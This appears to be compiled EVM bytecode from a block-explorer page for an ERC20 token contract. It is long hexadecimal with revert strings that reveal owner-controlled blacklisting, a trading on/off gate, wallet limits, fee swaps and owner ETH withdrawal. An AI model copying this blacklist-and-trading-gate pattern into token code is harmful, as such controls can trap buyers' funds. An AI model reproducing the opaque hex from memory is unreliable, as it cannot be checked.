81035f830152613b4b81613b12565b9050919050565b5f613b5c82612ca1565b9150613b6783612ca1565b9250828203905081811115613b7f57613b7e612fe6565b5b92915050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f613bb9601d83612ba3565b9150613bc482613b85565b602082019050919050565b5f6020820190508181035f830152613be681613bad565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b613c7981612c66565b82525050565b5f613c8a8383613c70565b60208301905092915050565b5f602082019050919050565b5f613cac82613c47565b613cb68185613c51565b9350613cc183613c61565b805f5b83811015613cf1578151613cd88882613c7f565b9750613ce383613c96565b925050600181019050613cc4565b5085935050505092915050565b5f60a082019050613d115f830188612d45565b613d1e6020830187613446565b8181036040830152613d308186613ca2565b9050613d3f6060830185612f23565b613d4c6080830184612d45565b9695505050505050565b7f50657263656e74616765206d757374206265206265747765656e203020616e645f8201527f2031303000000000000000000000000000000000000000000000000000000000602082015250565b5f613db0602483612ba3565b9150613dbb82613d56565b604082019050919050565b5f6020820190508181035f830152613ddd81613da4565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f613e3e602683612ba3565b9150613e4982613de4565b604082019050919050565b5f6020820190508181035f830152613e6b81613e32565b905091905056fea26469706673582212201d6405f86c6f67975481d00dbc7afb1cd6bba9d42a235af45f3796f316b3856564736f6c63430008150033000000000000000000000000ae36556394bc06b0124f4cc58afd22f100e4f94bf83113d06405ee7d33586b654c2707bbec28b530578318200a250b06883552cc

Deployed Bytecode

0x60806040526004361061021d575f3560e01c806389291a8f11610122578063c8c8ebe4116100aa578063dd8546521161006e578063dd854652146107ae578063e2f45605146107d8578063f2fde38b14610802578063f8b45b051461082a578063ffb54a991461085457610224565b8063c8c8ebe4146106de578063c9567bf914610708578063ca7030751461071e578063cf9522fd14610748578063dd62ed3e1461077257610224565b80639a7a23d6116100f15780639a7a23d6146105ee578063a457c2d714610616578063a9059cbb14610652578063afa4f3b21461068e578063c0246668146106b657610224565b806389291a8f146105485780638da5cb5b1461055e57806395d89b411461058857806397682884146105b257610224565b8063313ce567116101a55780636ddd1713116101745780636ddd17131461047c57806370a08231146104a6578063715018a6146104e25780637571336a146104f8578063881dce601461052057610224565b8063313ce567146103b057806339509351146103da5780634fbee19314610416578063583e05681461045257610224565b8063139864a8116101ec578063139864a8146102ce57806318160ddd146102e45780632315bf141461030e57806323b872dd1461034a578063311028af1461038657610224565b806306fdde0314610228578063095ea7b3146102525780630c6b67371461028e5780630f054c06146102b857610224565b3661022457005b5f80fd5b348015610233575f80fd5b5061023c61087e565b6040516102499190612c23565b60405180910390f35b34801561025d575f80fd5b5061027860048036038101906102739190612cd4565b61090e565b6040516102859190612d2c565b60405180910390f35b348015610299575f80fd5b506102a2610930565b6040516102af9190612d54565b60405180910390f35b3480156102c3575f80fd5b506102cc610936565b005b3480156102d9575f80fd5b506102e2610961565b005b3480156102ef575f80fd5b506102f8610985565b6040516103059190612d54565b60405180910390f35b348015610319575f80fd5b50610334600480360381019061032f9190612d6d565b61098e565b6040516103419190612d2c565b60405180910390f35b348015610355575f80fd5b50610370600480360381019061036b9190612d98565b6109e0565b60405161037d9190612d2c565b60405180910390f35b348015610391575f80fd5b5061039a610a0e565b6040516103a79190612d54565b60405180910390f35b3480156103bb575f80fd5b506103c4610a14565b6040516103d19190612e03565b60405180910390f35b3480156103e5575f80fd5b5061040060048036038101906103fb9190612cd4565b610a1c565b60405161040d9190612d2c565b60405180910390f35b348015610421575f80fd5b5061043c60048036038101906104379190612d6d565b610a52565b6040516104499190612d2c565b60405180910390f35b34801561045d575f80fd5b50610466610aa4565b6040516104739190612e77565b60405180910390f35b348015610487575f80fd5b50610490610ac8565b60405161049d9190612d2c565b60405180910390f35b3480156104b1575f80fd5b506104cc60048036038101906104c79190612d6d565b610adb565b6040516104d99190612d54565b60405180910390f35b3480156104ed575f80fd5b506104f6610b20565b005b348015610503575f80fd5b5061051e60048036038101906105199190612eba565b610b33565b005b34801561052b575f80fd5b5061054660048036038101906105419190612ef8565b610b93565b005b348015610553575f80fd5b5061055c610c76565b005b348015610569575f80fd5b50610572610d06565b60405161057f9190612f32565b60405180910390f35b348015610593575f80fd5b5061059c610d2e565b6040516105a99190612c23565b60405180910390f35b3480156105bd575f80fd5b506105d860048036038101906105d39190612d6d565b610dbe565b6040516105e59190612d2c565b60405180910390f35b3480156105f9575f80fd5b50610614600480360381019061060f9190612eba565b610ddb565b005b348015610621575f80fd5b5061063c60048036038101906106379190612cd4565b610e80565b6040516106499190612d2c565b60405180910390f35b34801561065d575f80fd5b5061067860048036038101906106739190612cd4565b610ef5565b6040516106859190612d2c565b60405180910390f35b348015610699575f80fd5b506106b460048036038101906106af9190612ef8565b610f17565b005b3480156106c1575f80fd5b506106dc60048036038101906106d79190612eba565b610f3c565b005b3480156106e9575f80fd5b506106f2610fea565b6040516106ff9190612d54565b60405180910390f35b348015610713575f80fd5b5061071c610ff0565b005b348015610729575f80fd5b50610732611524565b60405161073f9190612d54565b60405180910390f35b348015610753575f80fd5b5061075c61152a565b6040516107699190612d54565b60405180910390f35b34801561077d575f80fd5b5061079860048036038101906107939190612f4b565b611530565b6040516107a59190612d54565b60405180910390f35b3480156107b9575f80fd5b506107c26115b2565b6040516107cf9190612d54565b60405180910390f35b3480156107e3575f80fd5b506107ec6115b8565b6040516107f99190612d54565b60405180910390f35b34801561080d575f80fd5b5061082860048036038101906108239190612d6d565b6115be565b005b348015610835575f80fd5b5061083e611640565b60405161084b9190612d54565b60405180910390f35b34801561085f575f80fd5b50610868611646565b6040516108759190612d2c565b60405180910390f35b60606003805461088d90612fb6565b80601f01602080910402602001604051908101604052809291908181526020018280546108b990612fb6565b80156109045780601f106108db57610100808354040283529160200191610904565b820191905f5260205f20905b8154815290600101906020018083116108e757829003601f168201915b5050505050905090565b5f80610918611658565b905061092581858561165f565b600191505092915050565b600f5481565b61093e611822565b5f61094830610adb565b90505f81111561095e5761095d3033836118a0565b5b50565b610969611822565b5f610972610985565b905080600b8190555080600c8190555050565b5f600254905090565b5f60065f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b5f806109ea611658565b90506109f78582856122b5565b610a028585856118a0565b60019150509392505050565b600a5481565b5f6012905090565b5f80610a26611658565b9050610a47818585610a388589611530565b610a429190613013565b61165f565b600191505092915050565b5f60155f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b601060019054906101000a900460ff1681565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610b28611822565b610b315f612340565b565b610b3b611822565b8060165f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b60095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16610bd3611658565b73ffffffffffffffffffffffffffffffffffffffff1614610bf2575f80fd5b5f610bfb610985565b90505f610c0730610adb565b90505f60648484610c189190613046565b610c2291906130b4565b905080821015610c67576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c5e9061312e565b60405180910390fd5b610c7081612403565b50505050565b610c7e611822565b5f4711610cc0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cb790613196565b60405180910390fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc4790811502906040515f60405180830381858888f19350505050158015610d03573d5f803e3d5ffd5b50565b5f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060048054610d3d90612fb6565b80601f0160208091040260200160405190810160405280929190818152602001828054610d6990612fb6565b8015610db45780601f10610d8b57610100808354040283529160200191610db4565b820191905f5260205f20905b815481529060010190602001808311610d9757829003601f168201915b5050505050905090565b6006602052805f5260405f205f915054906101000a900460ff1681565b610de3611822565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e72576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e6990613224565b60405180910390fd5b610e7c8282612657565b5050565b5f80610e8a611658565b90505f610e978286611530565b905083811015610edc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ed3906132b2565b60405180910390fd5b610ee9828686840361165f565b60019250505092915050565b5f80610eff611658565b9050610f0c8185856118a0565b600191505092915050565b610f1f611822565b670de0b6b3a764000081610f339190613046565b600d8190555050565b610f44611822565b8060155f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051610fde9190612d2c565b60405180910390a25050565b600b5481565b610ff8611822565b60105f9054906101000a900460ff1615611047576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161103e9061331a565b60405180910390fd5b611074307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d600a5461165f565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b37f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b8152600401611110929190613338565b6020604051808303815f875af115801561112c573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906111509190613373565b505f7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156111bb573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906111df91906133b2565b90505f8173ffffffffffffffffffffffffffffffffffffffff166370a0823160075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff166040518263ffffffff1660e01b815260040161123c9190612f32565b602060405180830381865afa158015611257573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061127b91906133f1565b90505f611294603f600a546126f590919063ffffffff16565b90505f80831115611439576112b2834761275a90919063ffffffff16565b90505f6112da826112cc868661276f90919063ffffffff16565b61278490919063ffffffff16565b90506113083060075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1683612799565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b81526004015f604051808303815f87803b15801561136e575f80fd5b505af1158015611380573d5f803e3d5ffd5b505050507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663f305d7198330865f876113cd610d06565b426040518863ffffffff1660e01b81526004016113ef96959493929190613455565b60606040518083038185885af115801561140b573d5f803e3d5ffd5b50505050506040513d601f19601f8201168201806040525081019061143091906134b4565b505050506114e9565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663f305d7194730855f80611482610d06565b426040518863ffffffff1660e01b81526004016114a496959493929190613504565b60606040518083038185885af11580156114c0573d5f803e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906114e591906134b4565b5050505b6001601060016101000a81548160ff021916908315150217905550600160105f6101000a81548160ff02191690831515021790555050505050565b600e5481565b60125481565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b60115481565b600d5481565b6115c6611822565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611634576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161162b906135d3565b60405180910390fd5b61163d81612340565b50565b600c5481565b60105f9054906101000a900460ff1681565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036116cd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116c490613661565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361173b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611732906136ef565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516118159190612d54565b60405180910390a3505050565b61182a611658565b73ffffffffffffffffffffffffffffffffffffffff16611848610d06565b73ffffffffffffffffffffffffffffffffffffffff161461189e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161189590613757565b60405180910390fd5b565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361190e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611905906137e5565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361197c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161197390613873565b60405180910390fd5b60065f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16158015611a1a575060065f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b611a59576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a5090613901565b60405180910390fd5b601354600e5410611a6d5760016011819055505b601454600f5410611a815760016012819055505b5f8103611a9857611a9383835f612799565b6122b0565b611aa0610d06565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015611b0e5750611ade610d06565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611b4657505f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611b80575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611b995750600960149054906101000a900460ff16155b15611f945760105f9054906101000a900460ff16611c8c5760155f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680611c4c575060155f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b611c8b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c8290613969565b60405180910390fd5b5b60175f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611d29575060165f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611de757600b54811115611d73576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d6a906139f7565b60405180910390fd5b600c54611d7f83610adb565b82611d8a9190613013565b1115611dcb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dc290613a5f565b60405180910390fd5b600e5f815480929190611ddd90613a7d565b9190505550611f93565b60175f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611e84575060165f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611eea57600b54811115611ece576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ec590613b34565b60405180910390fd5b600f5f815480929190611ee090613a7d565b9190505550611f92565b60165f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16611f9157600c54611f4483610adb565b82611f4f9190613013565b1115611f90576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f8790613a5f565b60405180910390fd5b5b5b5b5b5f611f9e30610adb565b90505f8082119050808015611fbf5750601060019054906101000a900460ff165b8015611fd85750600960149054906101000a900460ff16155b801561202b575060175f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b801561207e575060155f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b80156120d1575060155f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15612115576001600960146101000a81548160ff0219169083151502179055506120fa83612a05565b5f600960146101000a81548160ff0219169083151502179055505b5f600960149054906101000a900460ff1615905060155f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16806121c4575060155f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b156121cd575f90505b5f81156122a05760175f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16156122525761224b606461223d6012548861276f90919063ffffffff16565b61278490919063ffffffff16565b905061227d565b61227a606461226c6011548861276f90919063ffffffff16565b61278490919063ffffffff16565b90505b5f81111561229157612290873083612799565b5b808561229d9190613b52565b94505b6122ab878787612799565b505050505b505050565b5f6122c08484611530565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461233a578181101561232c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161232390613bcf565b60405180910390fd5b612339848484840361165f565b5b50505050565b5f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f600267ffffffffffffffff81111561241f5761241e613bed565b5b60405190808252806020026020018201604052801561244d5781602001602082028036833780820191505090505b50905030815f8151811061246457612463613c1a565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015612507573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061252b91906133b2565b8160018151811061253f5761253e613c1a565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250506125a4307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d8461165f565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663791ac947835f8460095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16426040518663ffffffff1660e01b8152600401612626959493929190613cfe565b5f604051808303815f87803b15801561263d575f80fd5b505af115801561264f573d5f803e3d5ffd5b505050505050565b8060175f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b5f606482111561273a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161273190613dc6565b60405180910390fd5b606482846127489190613046565b61275291906130b4565b905092915050565b5f81836127679190613b52565b905092915050565b5f818361277c9190613046565b905092915050565b5f818361279191906130b4565b905092915050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612807576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127fe906137e5565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612875576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161286c90613873565b60405180910390fd5b612880838383612b8f565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015612903576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016128fa90613e54565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516129ec9190612d54565b60405180910390a36129ff848484612b94565b50505050565b5f612a0f30610adb565b90505f808203612a20575050612b8c565b5f601254601154612a319190613013565b03612aab575f82118015612a465750600d5482105b15612a5357819050612aa6565b5f612a7c6064612a6e6012548761276f90919063ffffffff16565b61278490919063ffffffff16565b90508084612a8a9190613b52565b9350600d54841115612aa057600d549150612aa4565b8391505b505b612b80565b5f82118015612ace5750612acb6002600d5461278490919063ffffffff16565b82105b15612ada575050612b8c565b5f82118015612afd5750612afa6002600d5461278490919063ffffffff16565b82115b8015612b0a5750600d5482105b15612b2c57612b256002600d5461278490919063ffffffff16565b9050612b7f565b5f612b556064612b476012548761276f90919063ffffffff16565b61278490919063ffffffff16565b90508084612b639190613b52565b9350600d54841115612b7957600d549150612b7d565b8391505b505b5b612b8981612403565b50505b50565b505050565b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015612bd0578082015181840152602081019050612bb5565b5f8484015250505050565b5f601f19601f8301169050919050565b5f612bf582612b99565b612bff8185612ba3565b9350612c0f818560208601612bb3565b612c1881612bdb565b840191505092915050565b5f6020820190508181035f830152612c3b8184612beb565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f612c7082612c47565b9050919050565b612c8081612c66565b8114612c8a575f80fd5b50565b5f81359050612c9b81612c77565b92915050565b5f819050919050565b612cb381612ca1565b8114612cbd575f80fd5b50565b5f81359050612cce81612caa565b92915050565b5f8060408385031215612cea57612ce9612c43565b5b5f612cf785828601612c8d565b9250506020612d0885828601612cc0565b9150509250929050565b5f8115159050919050565b612d2681612d12565b82525050565b5f602082019050612d3f5f830184612d1d565b92915050565b612d4e81612ca1565b82525050565b5f602082019050612d675f830184612d45565b92915050565b5f60208284031215612d8257612d81612c43565b5b5f612d8f84828501612c8d565b91505092915050565b5f805f60608486031215612daf57612dae612c43565b5b5f612dbc86828701612c8d565b9350506020612dcd86828701612c8d565b9250506040612dde86828701612cc0565b9150509250925092565b5f60ff82169050919050565b612dfd81612de8565b82525050565b5f602082019050612e165f830184612df4565b92915050565b5f819050919050565b5f612e3f612e3a612e3584612c47565b612e1c565b612c47565b9050919050565b5f612e5082612e25565b9050919050565b5f612e6182612e46565b9050919050565b612e7181612e57565b82525050565b5f602082019050612e8a5f830184612e68565b92915050565b612e9981612d12565b8114612ea3575f80fd5b50565b5f81359050612eb481612e90565b92915050565b5f8060408385031215612ed057612ecf612c43565b5b5f612edd85828601612c8d565b9250506020612eee85828601612ea6565b9150509250929050565b5f60208284031215612f0d57612f0c612c43565b5b5f612f1a84828501612cc0565b91505092915050565b612f2c81612c66565b82525050565b5f602082019050612f455f830184612f23565b92915050565b5f8060408385031215612f6157612f60612c43565b5b5f612f6e85828601612c8d565b9250506020612f7f85828601612c8d565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680612fcd57607f821691505b602082108103612fe057612fdf612f89565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61301d82612ca1565b915061302883612ca1565b92508282019050808211156130405761303f612fe6565b5b92915050565b5f61305082612ca1565b915061305b83612ca1565b925082820261306981612ca1565b915082820484148315176130805761307f612fe6565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6130be82612ca1565b91506130c983612ca1565b9250826130d9576130d8613087565b5b828204905092915050565b7f4e6f7420656e6f75676820746f6b656e730000000000000000000000000000005f82015250565b5f613118601183612ba3565b9150613123826130e4565b602082019050919050565b5f6020820190508181035f8301526131458161310c565b9050919050565b7f546f6b656e3a206e6f2045544820746f20636c656172000000000000000000005f82015250565b5f613180601683612ba3565b915061318b8261314c565b602082019050919050565b5f6020820190508181035f8301526131ad81613174565b9050919050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d205f8201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b5f61320e603983612ba3565b9150613219826131b4565b604082019050919050565b5f6020820190508181035f83015261323b81613202565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f61329c602583612ba3565b91506132a782613242565b604082019050919050565b5f6020820190508181035f8301526132c981613290565b9050919050565b7f54726164696e6720697320616c7265616479206f70656e0000000000000000005f82015250565b5f613304601783612ba3565b915061330f826132d0565b602082019050919050565b5f6020820190508181035f830152613331816132f8565b9050919050565b5f60408201905061334b5f830185612f23565b6133586020830184612d45565b9392505050565b5f8151905061336d81612e90565b92915050565b5f6020828403121561338857613387612c43565b5b5f6133958482850161335f565b91505092915050565b5f815190506133ac81612c77565b92915050565b5f602082840312156133c7576133c6612c43565b5b5f6133d48482850161339e565b91505092915050565b5f815190506133eb81612caa565b92915050565b5f6020828403121561340657613405612c43565b5b5f613413848285016133dd565b91505092915050565b5f819050919050565b5f61343f61343a6134358461341c565b612e1c565b612ca1565b9050919050565b61344f81613425565b82525050565b5f60c0820190506134685f830189612f23565b6134756020830188612d45565b6134826040830187613446565b61348f6060830186612d45565b61349c6080830185612f23565b6134a960a0830184612d45565b979650505050505050565b5f805f606084860312156134cb576134ca612c43565b5b5f6134d8868287016133dd565b93505060206134e9868287016133dd565b92505060406134fa868287016133dd565b9150509250925092565b5f60c0820190506135175f830189612f23565b6135246020830188612d45565b6135316040830187613446565b61353e6060830186613446565b61354b6080830185612f23565b61355860a0830184612d45565b979650505050505050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f6135bd602683612ba3565b91506135c882613563565b604082019050919050565b5f6020820190508181035f8301526135ea816135b1565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f61364b602483612ba3565b9150613656826135f1565b604082019050919050565b5f6020820190508181035f8301526136788161363f565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f6136d9602283612ba3565b91506136e48261367f565b604082019050919050565b5f6020820190508181035f830152613706816136cd565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f613741602083612ba3565b915061374c8261370d565b602082019050919050565b5f6020820190508181035f83015261376e81613735565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f6137cf602583612ba3565b91506137da82613775565b604082019050919050565b5f6020820190508181035f8301526137fc816137c3565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f61385d602383612ba3565b915061386882613803565b604082019050919050565b5f6020820190508181035f83015261388a81613851565b9050919050565b7f45524332303a207472616e736665722066726f6d2f746f2074686520626c61635f8201527f6b6c697374656420616464726573730000000000000000000000000000000000602082015250565b5f6138eb602f83612ba3565b91506138f682613891565b604082019050919050565b5f6020820190508181035f830152613918816138df565b9050919050565b7f54726164696e67206973206e6f74206163746976652e000000000000000000005f82015250565b5f613953601683612ba3565b915061395e8261391f565b602082019050919050565b5f6020820190508181035f83015261398081613947565b9050919050565b7f427579207472616e7366657220616d6f756e74206578636565647320746865205f8201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b5f6139e1603583612ba3565b91506139ec82613987565b604082019050919050565b5f6020820190508181035f830152613a0e816139d5565b9050919050565b7f4d61782077616c6c6574206578636565646564000000000000000000000000005f82015250565b5f613a49601383612ba3565b9150613a5482613a15565b602082019050919050565b5f6020820190508181035f830152613a7681613a3d565b9050919050565b5f613a8782612ca1565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203613ab957613ab8612fe6565b5b600182019050919050565b7f53656c6c207472616e7366657220616d6f756e742065786365656473207468655f8201527f206d61785472616e73616374696f6e416d6f756e742e00000000000